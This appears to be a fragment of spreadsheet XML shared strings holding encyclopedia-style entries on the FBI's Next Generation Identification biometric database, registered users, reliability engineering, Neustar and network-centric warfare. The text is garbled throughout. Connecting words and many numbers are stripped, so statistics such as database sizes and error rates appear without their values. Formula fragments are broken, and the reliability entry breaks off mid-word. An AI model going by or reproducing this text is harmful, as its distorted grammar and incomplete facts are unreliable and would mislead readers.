    <t>next generation identification (ngi) project federal bureau investigation (fbi). project's goal expand capabilities integrated automated fingerprint identification system (iafis), currently used enforcement identify subjects fingerprints look criminal history. system modular system (allowing easy expandability). also advanced lookup capabilities, incorporating palm print, iris, facial identification. first used system february 2011. system developed lockheed martin partnership safran number technology companies. 2012 database 13.6 million images representing million individuals, million images mid-2013, million records 2014. database includes non-criminal criminal face images, including least million face images taken non-criminal purposes added 2015. these noncriminal photos come part background check images submitted employers fbi. december 2015 database 70.8 million criminal records 38.5 civil records.in 2016 group organizations published letter condemning proposal make database exempt privacy provision allows individuals inspect records database check accuracy fairness. signatories included raza, color change, amnesty international, national lgbtq task force, well companies uber lyft. granted exemption 2017.the accepted percent error rate facial recognition technology, according 2010 document obtained foia. organizations involved project accenture systems createtank global science technology (gst) ingersoll consulting information solutions (icis) innovative management technology services (imts) lakota software solutions, lockheed martin national center state courts (ncsc) data platinum solutions references external links press release (february 2008) report department justice, justifying project (pdf file, august 2006) (archive page 2010) pushes s-comm spur public acceptance massive biometics database</t>
  </si>
  <si>
    <t>Registered user</t>
  </si>
  <si>
    <t>registered user user website, program, systems previously registered. registered users normally provide sort credentials (such username e-mail address, password) system order prove identity: known logging systems intended general public often allow user register simply selecting register sign function providing credentials first time. registered users granted privileges beyond granted unregistered users. rationale user registration login enables system personalize itself. example, website might display welcome banner user's name change appearance behavior according preferences indicated user. system also allow logged-in user send receive messages, view modify personal files information. criticism privacy concerns registration necessarily provides personal information system would otherwise have. even credentials used otherwise meaningless, system distinguish logged-in user users might property store history users' actions activity, possibly without knowledge consent. while many systems privacy policies, depending nature system, user might knowing certain exactly information stored, used, whom, anyone, shared. system could even sell information gathered users third parties advertising purposes. subject systems' transparency regard ongoing debate. user inconvenience registration seen annoyance hindrance, especially inherently necessary important (for example, context search engine) system repeatedly prompts users register. system's registration process might also time-consuming require user provide information might reluctant home address social security number. also references</t>
  </si>
  <si>
    <t>Reliability engineering</t>
  </si>
  <si>
    <t>reliability engineering sub-discipline systems engineering emphasizes ability equipment function without failure. reliability describes ability system component function stated conditions specified period time. reliability closely related availability, typically described ability component system function specified moment interval time. reliability function theoretically defined probability success time denoted r(t). this probability estimated detailed (physics failure) analysis, previous data sets reliability testing reliability modelling. availability, testability, maintainability maintenance often defined part "reliability engineering" reliability programs. reliability often plays role cost-effectiveness systems. reliability engineering deals prediction, prevention management high levels "lifetime" engineering uncertainty risks failure. although stochastic parameters define affect reliability, reliability achieved mathematics statistics. "nearly teaching literature subject emphasize aspects, ignore reality ranges uncertainty involved largely invalidate quantitative methods prediction measurement." example, easy represent "probability failure" symbol value equation, almost impossible predict true magnitude practice, massively multivariate, equation reliability begin equal accurate predictive measurement reliability. reliability engineering relates closely quality engineering, safety engineering system safety, common methods analysis require input other. said system must reliably safe. reliability engineering focuses costs failure caused system downtime, cost spares, repair equipment, personnel, cost warranty claims. history word reliability traced back 1816, first attested poet samuel taylor coleridge. before world term linked mostly repeatability; test type science) considered "reliable" results would obtained repeatedly. 1920s, product improvement statistical process control promoted walter shewhart bell labs, around time waloddi weibull working statistical models fatigue. development reliability engineering parallel path quality. modern word reliability defined u.s. military 1940s, characterizing product would operate expected specified period time. world many reliability issues inherent unreliability electronic equipment available time, fatigue issues. 1945, m.a. miner published seminal paper titled "cumulative damage fatigue" asme journal. main application reliability engineering military vacuum tube used radar systems electronics, reliability proved problematic costly. ieee formed reliability society 1948. 1950, united states department defense formed group called "advisory group reliability electronic equipment" (agree) investigate reliability methods military equipment. this group recommended three main ways working: improve component reliability. establish quality reliability requirements suppliers. collect field data find root causes failures.in 1960s, emphasis given reliability testing component system level. famous military standard mil-std-781 created time. around period also much-used predecessor military handbook published used prediction failure rates electronic components. emphasis component reliability empirical research (e.g. 217) alone slowly decreased. more pragmatic approaches, used consumer industries, used. 1980s, televisions increasingly made solid-state semiconductors. automobiles rapidly increased semiconductors variety microcomputers hood dash. large conditioning systems developed electronic controllers, microwave ovens variety appliances. communications systems began adopt electronics replace older mechanical switching systems. bellcore issued first consumer prediction methodology telecommunications, developed similar document sae870050 automotive applications. nature predictions evolved decade, became apparent complexity factor determined failure rates integrated circuits (ics). wong published paper questioning bathtub curve—see also reliability-centered maintenance. during decade, failure rate many components dropped factor software became important reliability systems. 1990s, pace development picking wider stand-alone microcomputers common, market helped keep densities following moore's doubling every months. reliability engineering changing moved towards understanding physics failure. failure rates components kept dropping, system-level issues became prominent. systems thinking became important. software, model (capability maturity model) developed, gave qualitative approach reliability. 9000 added reliability measures part design development portion certification. expansion world-wide created challenges security trust. older problem little reliability information available replaced much information questionable value. consumer reliability problems could discussed online real time using data. technologies micro-electromechanical systems (mems), handheld gps, hand-held devices combined cell phones computers represent challenges maintain reliability. product development time continued shorten decade done three years done months. this meant reliability tools tasks closely tied development process itself. many ways, reliability became part everyday life consumer expectations. overview objective objectives reliability engineering, decreasing order priority, are: apply engineering knowledge specialist techniques prevent reduce likelihood frequency failures. identify correct causes failures occur despite efforts prevent them. determine ways coping failures occur, causes corrected. apply methods estimating likely reliability designs, analysing reliability data.the reason priority emphasis effective working, terms minimizing costs generating reliable products. primary skills required, therefore, ability understand anticipate possible causes failures, knowledge prevent them. also necessary knowledge methods used analysing designs data. scope techniques reliability engineering "complex systems" requires different, elaborate systems approach non-complex systems. reliability engineering case involve: system availability mission readiness analysis related reliability maintenance requirement allocation functional system failure analysis derived requirements specification inherent (system) design reliability analysis derived requirements specification hardware software design system diagnostics design fault tolerant systems (e.g. redundancy) predictive preventive maintenance (e.g. reliability-centered maintenance) human factors human interaction human errors manufacturing- assembly-induced failures (effect detected "0-hour quality" reliability) maintenance-induced failures transport-induced failures storage-induced failures (load) studies, component stress analysis, derived requirements specification software (systematic) failures failure reliability testing (and derived requirements) field failure monitoring corrective actions spare parts stocking (availability control) technical documentation, caution warning analysis data information acquisition/organisation (creation general reliability development hazard fracas system) chaos engineeringeffective reliability engineering requires understanding basics failure mechanisms experience, broad engineering skills good knowledge many different special fields engineering required, example: tribology stress (mechanics) fracture mechanics fatigue thermal engineering fluid mechanics shock-loading engineering electrical engineering chemical engineering (e.g. corrosion) material science definitions reliability defined following ways: idea item purpose respect time capacity designed, produced, maintained item perform required time capacity population designed, produced maintained items perform required time resistance failure item time probability item perform required function stated conditions specified period time durability object basics reliability assessment many engineering techniques used reliability risk assessments, reliability block diagrams, hazard analysis, failure mode effects analysis (fmea), fault tree analysis (fta), reliability centered maintenance, (probabilistic) load material stress wear calculations, (probabilistic) fatigue creep analysis, human error analysis, manufacturing defect analysis, reliability testing, etc. crucial analyses done properly much attention detail effective. because large number reliability techniques, expense, varying degrees reliability required different situations, projects develop reliability program plan specify reliability tasks (statement work (sow) requirements) performed specific system. consistent creation safety cases, example arp4761, goal reliability assessments provide robust qualitative quantitative evidence component system associated unacceptable risk. basic steps take thoroughly identify relevant unreliability "hazards", e.g. potential conditions, events, human errors, failure modes, interactions, failure mechanisms root causes, specific analysis tests. assess associated system risk, specific analysis testing. propose mitigation, e.g. requirements, design changes, detection logic, maintenance, training, risks lowered controlled acceptable level. determine best mitigation agreement final, acceptable risk levels, possibly based cost/benefit analysis.risk combination probability severity failure incident (scenario) occurring. severity looked system safety system availability point view. reliability safety thought different focus reliability system availability. availability safety exist dynamic tension keeping system available unsafe. forcing engineering system safe state quickly force false alarms impede availability system. minimis definition, severity failures includes cost spare parts, man-hours, logistics, damage (secondary failures), downtime machines cause production loss. complete definition failure also mean injury, dismemberment, death people within system (witness mine accidents, industrial accidents, space shuttle failures) innocent bystanders (witness citizenry cities like bhopal, love canal, chernobyl, sendai, victims 2011 tōhoku earthquake tsunami)—in case, reliability engineering becomes system safety. what acceptable determined managing authority customers affected communities. residual risk risk left reliability activities finished, includes unidentified risk—and therefore completely quantifiable. complexity technical systems improvements design materials, planned inspections, fool-proof design, backup redundancy decreases risk increases cost. risk decreased alara reasonably achievable) alapa practically achievable) levels. reliability availability program plan implementing reliability program simply software purchase; checklist items must completed ensure reliable products processes. reliability program complex learning knowledge-based system unique one's products processes. supported leadership, built skills develops within team, integrated business processes executed following proven standard work practices.a reliability program plan used document exactly "best practices" (tasks, methods, tools, analysis, tests) required particular (sub)system, well clarify customer requirements reliability assessment. large-scale complex systems, reliability program plan separate document. resource determination manpower budgets testing tasks critical successful program. general, amount work required effective program complex systems large. reliability program plan essential achieving high levels reliability, testability, maintainability, resulting system availability, developed early system development refined system's life-cycle. specifies reliability engineer does, also tasks performed stakeholders. effective reliability program plan must approved program management, responsible allocation sufficient resources implementation. reliability program plan also used evaluate improve availability system strategy focusing increasing testability maintainability reliability. improving maintainability generally easier improving reliability. maintainability estimates (repair rates) also generally accurate. however, uncertainties reliability estimates cases large, likely dominate availability calculation (prediction uncertainty problem), even maintainability levels high. when reliability control, complicated issues arise, like manpower (maintainers customer service capability) shortages, spare part availability, logistic delays, lack repair facilities, extensive retro-fit complex configuration management costs, others. problem unreliability increased also "domino effect" maintenance-induced failures repairs. focusing maintainability therefore enough. failures prevented, none issues importance, therefore reliability generally regarded important part availability. reliability needs evaluated improved related availability total cost ownership (tco) cost spare parts, maintenance man-hours, transport costs, storage cost, part obsolete risks, etc. but, toyota belatedly discovered, also includes downstream liability costs reliability calculations sufficiently accurately addressed customers' personal bodily risks. often trade-off needed two. there might maximum ratio availability cost ownership. testability system also addressed plan, link reliability maintainability. maintenance strategy influence reliability system (e.g., preventive and/or predictive maintenance), although never bring inherent reliability. reliability plan clearly provide strategy availability control. whether availability also cost ownership important depends system. example, system critical link production system—e.g., platform—is normally allowed high cost ownership cost translates even minor increase availability, unavailability platform results massive loss revenue easily exceed high cost ownership. proper reliability plan always address ramt analysis total context. ramt stands reliability, availability, maintainability/maintenance, testability context customer's needs. reliability requirements system, first tasks reliability engineering adequately specify reliability maintainability requirements allocated overall availability needs and, importantly, derived proper design failure analysis preliminary prototype test results. clear requirements (able designed constrain designers designing particular unreliable items constructions interfaces systems. setting availability, reliability, testability, maintainability targets (e.g., max. failure rates) appropriate. this broad misunderstanding reliability requirements engineering. reliability requirements address system itself, including test assessment requirements, associated tasks documentation. reliability requirements included appropriate system subsystem requirements specifications, test plans, contract statements. creation proper lower-level requirements critical. provision quantitative minimum targets (e.g., mean time between failure (mtbf) values failure rates) sufficient different reasons. reason full validation (related correctness verifiability time) quantitative reliability allocation (requirement spec) lower levels complex systems (often) made consequence fact requirements probabilistic, extremely high level uncertainties involved showing compliance probabilistic requirements, reliability function time, accurate estimates (probabilistic) reliability number item available late project, sometimes even many years in-service use. compare problem continuous (re-)balancing example, lower-level-system mass requirements development aircraft, already often undertaking. notice case, masses differ terms function time, data non-probabilistic available already models. case reliability, levels unreliability (failure rates) change factors decades (multiples result minor deviations design, process, anything else. information often available without huge uncertainties within development phase. this makes allocation problem almost impossible useful, practical, valid manner result massive over- under-specification. pragmatic approach therefore needed—for example: general levels classes quantitative requirements depending severity failure effects. also, validation results subjective task type requirement. (quantitative) reliability parameters—in terms mtbf—are uncertain design parameters design. furthermore, reliability design requirements drive (system part) design incorporate features prevent failures occurring, limit consequences failure first place. would predictions, effort would keep distracting engineering effort kind accounting work. design requirement precise enough designer "design also prove—through analysis testing—that requirement achieved, and, possible, within stated confidence. type reliability requirement detailed could derived failure analysis (finite-element stress fatigue analysis, reliability hazard analysis, fta, fmea, human factor analysis, functional hazard analysis, etc.) type reliability testing. also, requirements needed verification tests (e.g., required overload stresses) test time needed. derive requirements effective manner, systems engineering-based risk assessment mitigation logic used. robust hazard systems must created contain detailed information systems could failed. requirements derived tracked way. these practical design requirements shall drive design used verification purposes. these requirements (often design constraints) derived failure analysis preliminary tests. understanding difference compared purely quantitative (logistic) requirement specification (e.g., failure rate mtbf target) paramount development successful (complex) systems.the maintainability requirements address costs repairs well repair time. testability (not confused test requirements) requirements provide link reliability maintainability address detectability failure modes particular system level), isolation levels, creation diagnostics (procedures). indicated above, reliability engineers also address requirements various reliability tasks documentation system development, testing, production, operation. these requirements generally specified contract statement work depend much leeway customer wishes provide contractor. reliability tasks include various analyses, planning, failure reporting. task selection depends criticality system well cost. safety-critical system require formal failure reporting review process throughout development, whereas non-critical system rely final test reports. common reliability program tasks documented reliability program standards, mil-std-785 ieee 1332. failure reporting analysis corrective action systems common approach product/process reliability monitoring. reliability culture human errors human factors practice, failures traced back type human error, example management decisions (e.g. budgeting, timing, required tasks) systems engineering: studies (load cases) systems engineering: requirement analysis setting systems engineering: configuration control assumptions calculations simulations analysis design design drawings testing (e.g. incorrect load settings failure measurement) statistical analysis manufacturing quality control maintenance maintenance manuals training classifying ordering information feedback field information (e.g. incorrect vague) etc.however, humans also good detecting failures, correcting them, improvising abnormal situations occur. therefore, policies completely rule human actions design production processes improve reliability effective. some tasks better performed humans better performed machines.furthermore, human errors management; organization data information; misuse abuse items, also contribute unreliability. this core reason high levels reliability complex systems achieved following robust systems engineering process proper planning execution validation verification tasks. this also includes careful organization data information sharing creating "reliability culture", "safety culture" paramount development safety critical systems. reliability prediction improvement reliability prediction combines: creation proper reliability model (see page) estimation (and justification) input parameters model (e.g. failure rates particular failure mode event mean time repair system particular failure) estimation output reliability parameters system part level (i.e. system availability frequency particular functional failure) emphasis quantification target setting (e.g. mtbf) might imply limit achievable reliability, however, inherent limit development higher reliability need costly. addition, argue prediction reliability historic data misleading, comparisons valid identical designs, products, manufacturing processes, maintenance identical operating loads usage environments. even minor changes could major effects reliability. furthermore, unreliable important items (i.e. interesting candidates reliability investigation) likely modified re-engineered since historical data gathered, making standard (re-active pro-active) statistical methods processes used e.g. medical insurance industries less effective. another surprising logical argument able accurately predict reliability testing, exact mechanisms failure must known therefore cases could prevented! following incorrect route trying quantify solve complex reliability engineering problem terms mtbf probability using an-incorrect example, re-active approach referred barnard "playing numbers game" regarded practice.for existing systems, arguable attempt responsible program correct root cause discovered failures render initial mtbf estimate invalid, assumptions (themselves subject high error levels) effect correction must made. another practical issue general unavailability detailed failure data, available often featuring inconsistent filtering failure (feedback) data, ignoring statistical errors (which high rare events like reliability related failures). very clear guidelines must present count compare failures related different type root-causes (e.g. manufacturing-, maintenance-, transport-, system-induced inherent design failures). comparing different types causes lead incorrect estimations incorrect business decisions focus improvement. perform proper quantitative reliability prediction systems difficult expensive done testing. individual part-level, reliability results often obtained comparatively high confidence, testing many sample parts might possible using available testing budget. however, unfortunately tests lack validity system-level assumptions made part-level testing. these authors emphasized importance initial part- system-level testing failure, learn failures improve system part. general conclusion drawn accurate absolute prediction either field-data comparison testing reliability cases possible. exception might failures wear-out problems fatigue failures. introduction mil-std-785 written reliability prediction used great caution, used solely comparison trade-off studies. design reliability design reliability (dfr) process encompasses tools procedures ensure product meets reliability requirements, environment, duration lifetime. implemented design stage product proactively improve product reliability. often used part overall design excellence (dfx) strategy. statistics-based approach (i.e. mtbf) reliability design begins development (system) model. reliability availability models block diagrams fault tree analysis provide graphical means evaluating relationships different parts system. these models incorporate predictions based failure rates taken historical data. while (input data) predictions often accurate absolute sense, valuable assess relative differences design alternatives. maintainability parameters, example mean time repair (mttr), also used inputs models. important fundamental initiating causes failure mechanisms identified analyzed engineering tools. diverse practical guidance performance reliability provided designers generate low-stressed designs products protect, protected against, damage excessive wear. proper validation input loads (requirements) needed, addition verification reliability "performance" testing. important design techniques redundancy. this means part system fails, alternate success path, backup system. reason ultimate design choice related fact high-confidence reliability evidence parts systems often available, extremely expensive obtain. combining redundancy, together high level failure monitoring, avoidance common cause failures; even system relatively poor single-channel (part) reliability, made highly reliable system level mission critical reliability). testing reliability required this. conjunction redundancy, dissimilar designs manufacturing processes (e.g. different suppliers similar parts) single independent channels, provide less sensitivity quality issues (e.g. early childhood failures single supplier), allowing very-high levels reliability achieved moments development cycle (from early life long-term). redundancy also applied systems engineering double checking requirements, data, designs, calculations, software, tests overcome systematic failures. another effective deal reliability issues perform analysis predicts degradation, enabling prevention unscheduled downtime events failures. (reliability centered maintenance) programs used this. physics-of-failure-based approach electronic assemblies, increasing shift towards different approach called physics failure. this technique relies understanding physical static dynamic failure mechanisms. accounts variation load, strength, stress lead failure high level detail, made possible modern finite element method (fem) software programs handle complex geometries mechanisms creep, stress relaxation, fatigue, probabilistic design (monte carlo methods/doe). material component re-designed reduce probability failure make robust variations. another common design technique component derating: i.e. selecting components whose specifications significantly exceed expected stress levels, using heavier gauge electrical wire might normally specified expected electric current. common tools techniques many tasks, techniques, analyses used reliability engineering specific particular industries applications, commonly include: physics failure (pof) built-in self-test (bit) (testability analysis) failure mode effects analysis (fmea) reliability hazard analysis reliability block-diagram analysis dynamic reliability block-diagram analysis fault tree analysis root cause analysis statistical engineering, design experiments e.g. simulations models testing sneak circuit analysis accelerated testing reliability growth analysis (re-active reliability) weibull analysis (for testing mainly "re-active" reliability) thermal analysis finite element analysis (fea) measurement thermal induced, shock vibration fatigue analysis measurement electromagnetic analysis avoidance single point failure (spof) functional analysis functional failure analysis (e.g., function fmea, ffa) predictive preventive maintenance: reliability centered maintenance (rcm) analysis testability analysis failure diagnostics analysis (normally also incorporated fmea) human error analysis operational hazard analysis preventative/planned maintenance optimization (pmo) manual screening integrated logistics supportresults methods presented reviews part system design, logistics. reliability requirement among many complex part system. engineering trade-off studies used determine optimum balance reliability requirements constraints. importance language reliability engineers, whether using quantitative qualitative methods describe failure hazard, rely language pinpoint risks enable issues solved. language used must help create orderly description function/item/system complex surrounding relates failure functions/items/systems. systems engineering much finding correct words describe problem (and related risks), readily solved engineering solutions. jack ring said systems engineer's "language project." (ring 2000) part/system failures, reliability engineers concentrate "why how", rather predicting "when". understanding "why" failure occurred (e.g. over-stressed components manufacturing issues) likely lead improvement designs processes used quantifying "when" failure likely occur (e.g. determining mtbf). this, first reliability hazards relating part/system need classified ordered (based form qualitative quantitative logic possible) allow efficient assessment eventual improvement. this partly done pure language proposition logic, also based experience similar items. this example seen descriptions events fault tree analysis, fmea analysis, hazard (tracking) logs. sense language proper grammar (part qualitative analysis) plays important role reliability engineering, like safety engineering in-general within systems engineering. correct language also identifying reducing risks human error, often root cause many failures. this include proper instructions maintenance manuals, operation manuals, emergency procedures, others prevent systematic human errors result system failures. these written trained experienced technical authors using so-called simplified english simplified technical english, words structure specifically chosen created reduce ambiguity risk confusion (e.g. "replace part" could ambiguously refer swapping worn-out part non-worn-out part, replacing part using recent hopefully improved design). reliability modeling reliability modeling process predicting understanding reliability component system prior implementation. types analysis often used model complete system's availability behavior including effects logistics issues like spare part provisioning, transport manpower fault tree analysis reliability block diagrams. component level, types analyses used together others. input models come many sources including testing; prior operational experience; field data; well data handbooks similar related industries. regardless source, model input data must used great caution, predictions valid cases product used context. such, predictions often used help compare alternatives. part level predictions, separate fields investigation common: physics failure approach uses understanding physical failure mechanisms involved, mechanical crack propagation chemical corrosion degradation failure; parts stress modelling approach empirical method prediction based counting number type components system, stress undergo operation. reliability theory reliability defined probability device perform intended function specified period time stated conditions. mathematically, expressed {\displaystyle f(x)\!} failure probability density function {\displaystyle length period time (which assumed start time zero). there elements definition: reliability predicated "intended function:" generally, taken mean operation without failure. however, even individual part system fails, system whole intended, still charged system reliability. system requirements specification criterion reliability measured. reliability applies specified period time. practical terms, means system specified chance operate without failure time {\displaystyle t\!} reliability engineering ensures components materials meet requirements specified time. note units time sometimes used (e.g. mission", "operation cycles"). reliability restricted operation stated explicitly defined) conditions. this constraint necessary impossible design system unlimited conditions. mars rover different specified conditions family car. operating environment must addressed design testing. that rover required operate varying conditions requiring additional scrutiny. notable references reliability theory mathematical statistical foundations barlow, proschan, (1982) samaniego, (2007). quantitative system reliability parameters—theory quantitative requirements specified using reliability parameters. common reliability parameter mean time failure (mttf), also specified failure rate (this expressed frequency conditional probability density function (pdf)) number failures given period. these parameters useful higher system levels systems operated frequently (i.e. vehicles, machinery, electronic equipment). reliability increases mttf increases. mttf usually specified hours, also used units measurement, miles cycles. using mttf values lower system levels misleading, especially specify associated failures modes mechanisms (the mttf).in cases, reliability specified probability mission success. example, reliability scheduled aircraft flight specified dimensionless probability percentage, often used system safety engineering. special case mission success single-shot device system. these devices systems remain relatively dormant operate once. examples include automobile airbags, thermal batteries missiles. single-shot reliability specified probability one-time success subsumed related paramete</t>
  </si>
  <si>
    <t>Neustar</t>
  </si>
  <si>
    <t>neustar, inc., american technology company provides real-time information analytics risk, digital performance, defense, telecommunications, entertainment, marketing industries, also provides clearinghouse directory services global communications internet industries. neustar domain name registry number top-level domains, including .biz, behalf united states department commerce), .co, .nyc behalf city york), behalf national internet exchange india). until 2018, neustar also north american numbering plan administrator behalf federal communications commission, role continued founder, lockheed martin. their first contract granted 1997 renewed spin-off 1999, 2004, 2012. since 2019, replaced somos, inc. history neustar founded delaware 1998 business unit within lockheed martin corporation. spun keep neutrality essential original core contract nation's telecommunications providers. november 2006, bought followap, inc., uk-based enabler mobile instant messaging services.in 2010, lisa hook named firm's president chief operating officer. january 2010, washington post reported hook's leadership, neustar chosen consortium hollywood studios technology executives manage system whereby consumers could access movies video entertainment multiple digital devices. this system named "ultraviolet". over next years, neustar bought several companies: targusinfo (2011), aggregate knowledge (2013) internet (2014).neustar entered asset purchase agreement 2015 transaction network services caller authentication assets. following year, neustar planned split independent publicly traded companies. this plan abandoned later year golden gate capital announced neustar public shares approximately $2.9 billion ($33.50 share). this completed august 2017.neustar lost npac contract 2016 ericsson subsidiary telcordia. neustar administered number portability system since 1997. local-number-portability administrator (lnpa) created handle number portability administration center (npac), enables users take phone numbers switch service providers. npac manages routing calls texts million canadian phone numbers 2,000 carriers.charles gottdiener appointed president chief executive officer, succeeding lisa hook july 2018. october, neustar announced bought verisign's security services customer contracts. this includes ddos protection, firewall, managed recursive services customer contracts. three months later, neustar bought trustid, caller authentication fraud prevention systems provider contact centers.godaddy bought neustar's domain name registry business august 2020, renamed godaddy registry. late 2021, transunion purchased neustar's main business billion. however, neustar's security business, neustar security services, excluded transaction remained portfolio company golden gate capital gic. business from 1998 2015, original business neustar administration north american numbering plan, maintenance system directories databases manage telephone area codes central office prefixes north america. this enables routing calls among thousands competing communications service providers (csps). neustar also provided clearinghouse services emerging csps, including internet service providers (isps), mobile network operators, cable television operators, voice internet protocol (voip) service providers.neustar offers internal external managed domain name system (dns) services play role directing managing traffic internet, cloud-based ddos attack protection website performance management tools. before purchased godaddy, neustar managed authoritative directories .biz internet domains, acted worldwide "registry gateway" china's taiwan's internet domains outside countries. neustar also provided back registry services level domain. neustar previously operated authoritative directory u.s. common short codes, part short messaging service (sms) relied upon u.s. wireless industry, provides solutions used mobile network operators enable mobile instant messaging users. ctia granted contract iconectiv, took providing common short code (csc) registry services january 2016.neustar offered "digital rights locker" hollywood studios, consumer electronics manufacturers retailers looking digital restrictions management, ultraviolet planned mobile trust authority (mdtv) open mobile video coalition (omvc). ultraviolet shut july 2019. also communications assistance enforcement compuware neotys references further reading neustar, inc. (february 2012), u.s. securities exchange commission form 10-k, fy2011, form 10-k external links official website</t>
  </si>
  <si>
    <t>Network-centric warfare</t>
  </si>
  <si>
    <t>network-centric warfare, also called network-centric operations net-centric warfare, military doctrine theory seeks translate information advantage, enabled part information technology, competitive advantage robust computer networking well informed geographically dispersed forces. based ideas marshal ussr nikolai ogarkov, early 1980s. pioneered united states department defense 1990s. background history network centric warfare trace immediate origins 1996 admiral william owens introduced concept 'system systems' paper published institute national security studies. owens described serendipitous evolution system intelligence sensors, command control systems, precision weapons enabled enhanced situational awareness, rapid target assessment, distributed weapon assignment. also 1996, joint chiefs staff released joint vision 2010, introduced military concept full-spectrum dominance. full spectrum dominance described ability military dominate battlespace peace operations outright application military power stemmed advantages information superiority. network centric warfare term "network-centric warfare" associated concepts first appeared department navy's publication, "copernicus: c4isr 21st century." ideas networking sensors, commanders, shooters flatten hierarchy, reduce operational pause, enhance precision, increase speed command captured document. distinct concept, however, network-centric warfare first appeared publicly 1998 naval institute proceedings article vice admiral arthur cebrowski john garstka. however, first complete articulation idea contained book network centric warfare developing leveraging information superiority david alberts, john garstka frederick stein, published command control research program (ccrp). this book derived theory warfare series case studies business using information communication technologies improve situation analysis, accurately control inventory production, well monitor customer relations. understanding information warfare network-centric warfare followed 2001 understanding information warfare (uiaw), jointly authored alberts, garstka, richard hayes evidence based research david signori rand. uiaw pushed implications shifts identified network-centric warfare order derive operational theory warfare. starting series premises environment sensed, uiaw posits structure three domains. physical domain events take place perceived sensors individuals. data emerging physical domain transmitted information domain. data subsequently received processed cognitive domain assessed acted upon. process replicates "observe, orient, decide, act" loop first described col. john boyd usaf. power edge last publication dealing developing theory network centric warfare appeared 2003 power edge, also published ccrp. power edge speculative work suggesting modern military environments complex understood individual, organisation, even military service. modern information technology permits rapid effective sharing information degree "edge entities" essentially conducting military missions themselves, able "pull" information ubiquitous repositories, rather centralised agencies attempt anticipate information needs "push" them. this would imply major flattening traditional military hierarchies, however. power edge's radical ideas investigation pentagon since least 2001. uiaw, concept peer-to-peer activity combined traditional hierarchical flow data network introduced. shortly thereafter, pentagon began investing peer-to-peer research, telling software engineers november 2001 peer-to-peer conference advantages gained redundancy robustness peer-to-peer network topology battlefield. network-centric warfare/operations cornerstone ongoing transformation effort department defense initiated former secretary defense donald rumsfeld. also five goals office force transformation, office secretary defense. revolution military affairs information known "defense transformation" "transformation". related technologies programs mandated global information grid (gig) primary technical framework support network-centric warfare/network-centric operations. under directive, advanced weapons platforms, sensor systems, command control centers eventually linked gig. term system systems often used describe results types massive integration efforts. topic net-centric enterprise services addresses applications context gig. number significant u.s. military programs taking technical steps towards supporting network-centric warfare. these include cooperative engagement capability (cec) united states navy network united states army. net-centric enterprise solutions interoperability (nesi) provides, phases acquisition net-centric solutions, actionable guidance meets network-centric warfare goals united states department defense. guidance nesi derived higher level, abstract concepts provided various directives, policies mandates net-centric operations warfare reference model (ncow asd(nii) net-centric checklist. doctrinal tenets united states doctrine network-centric warfare united states armed forces draws highest level guidance concept "team warfare", meaning integration synchronization appropriate capabilities across various services, ranging army force coast guard. this part principle joint warfare. tenets network-centric warfare are: tenet robustly networked force improves information sharing. tenet information sharing collaboration enhance quality information shared situational awareness. tenet shared situational awareness enables self-synchronization. tenet these, turn, dramatically increase mission effectiveness.net-centric operations compatible mission command doctrine, theoretically allows considerable freedom action combat troops, decentralized approaches command control (c2). some architectural design challenges complexity joint tactical radio system (jtrs) offers insight challenges integrating numerous different communications systems unified whole. intended software-defined radio battlefield communications backwards compatible large number military civilian radio systems. april 2008 report (gao report) highlighted scalability network major risk factor network centric program. proposed system unable network units self-forming, self-healing network. problem coordinating bandwidth usage battlespace significant challenge, every piece mobile equipment human participant becomes potential source relay emissions. difficult efficiently transfer information networks different levels security classification. although multi-level security systems provide part solution, human intervention decision-making still needed determine specific data cannot transferred. accurate locational awareness limited maneuvering areas global positioning system (gps) coverage weak non-existent. these areas include inside buildings, caves, etc. well built-up areas urban canyons, also settings many modern military operations. much work reliable fusion positional data multiple sensors remains done. providing secure communications network-centric warfare/network-centric operations difficult, since successful management encryption typically difficult aspect cryptography, especially mobile systems. problem exacerbated need speedy deployment nimble reconfiguration military teams, respond rapidly changing conditions modern battlespace. international activities there significant need harmonize technical operational aspects net-centric warfare net-centric operations among multiple nations, order support coalition activities, joint operations, etc. nato command structure many nato non-nato nations joined federated mission networking (fmn) initiative work together framework process coordinate design, development delivery operational technical capabilities required conduct net-centric operations. within alliance nato interoperability standards profiles (nisp) provides necessary guidance technical components support project implementations federated mission networking. individual standardization agreements coordinating vehicle establishing shared technical standards among nato nations. also partnership peace information extending coordination efforts non-nato nations keen support military operations activities, international peacekeeping, disaster response, humanitarian aid, etc. supporting comments "with less half ground forces two-thirds military aircraft used years desert storm, achieved difficult objective. desert storm, usually took days target planners photo target, confirm coordinates, plan mission, deliver bomber crew. near real-time imaging targets photos coordinates transmitted e-mail aircraft already flight. desert storm, battalion, brigade, division commanders rely maps, grease pencils, radio reports track movements forces. today, commanders real-time display armed forces computer screen."—former vice president richard cheney. "net-centric warfare's effectiveness greatly improved years. desert storm forces, involving 500,000 troops, supported mbit/s bandwidth. today, forces, 350,000 warfighters, 3,000 mbit/s satellite bandwidth, times bandwidth force percent smaller. u.s. troops essentially used weapon platforms used operation desert storm significantly increased effectiveness."—lieutenant general harry raduege director, defense information systems agency. contradictory views "our incipient plans suffer defeat [adversaries] using primitive cagey techniques, inspired ideology neither match understand; enemy knock vulnerable global positioning system electromagnetic pulse weapons limited scale, removing intelligence construed come depend upon. fighting forces accustomed relying upon downlinks information commands would little fall back upon." aspiration australian defence force (adf) embrace network-centric warfare outlined document force 2020. this vision criticized aldo borgu, director australian strategic policy institute (aspi). developing interoperability u.s. systems, view, three arms australian defence force could operating better sister united states services other.network centric warfare criticized proponents fourth generation warfare (4gw) doctrine.also, since network-centric warfare focuses much distributing information, wary effect false, misleading, misinterpreted information entering system, enemy deception simple error. just usefulness correct information amplified, repercussions incorrect data entering system achieve much greater non-positive outcomes.one happen errors initial conditions uncorrected, closed system subsequently skew result-sets; result-sets reused, amplifying initial error orders magnitude subsequent generations result-sets; chaos theory.other possible failure modes problem areas network-centric warfare include occurrence byzantine generals' problem peer-to-peer systems; problems caused inadequate shallow understanding general disregard for) self-regulation, self-organization, systems theory, emergent behavior cybernetics; addition this, potential issues arising nature complex, rapidly developed artificial system arising complexity theory, implies possibility failure modes congestion collapse cascading failure. also autonomous logistics battlespace c4istar cyberwarfare information warfare list cyber warfare forces network simulator references external links oasd-nii command control research program (ccrp) net-centric enterprise solutions interoperability (nesi) related article crosstalk defense software engineering journal army college article: principles warfare network-centric battlefield globalsecurity.org c4i.org computer security intelligence</t>
  </si>
  <si>
    <t>Network security</t>
  </si>
  <si>
